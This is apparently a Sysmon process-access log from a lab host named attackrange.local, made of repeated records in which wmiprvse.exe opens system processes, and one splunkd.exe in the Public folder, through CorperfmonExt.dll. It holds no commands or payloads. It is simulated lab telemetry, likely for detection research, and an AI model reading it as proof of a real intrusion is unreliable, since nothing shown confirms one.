21:43:48.549{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149760Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.549{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149759Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.549{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149758Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.548{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149757Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.548{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149756Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.548{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149755Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.548{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149754Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.548{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149753Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.547{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149752Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.547{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149751Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.547{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149750Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.547{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149749Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.546{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149748Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.546{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149747Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.546{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149746Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.545{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149745Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.545{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149744Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.545{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149743Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.545{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149742Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.544{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149741Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.544{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149740Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.544{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149739Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.544{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149738Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.544{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149737Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:48.543{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 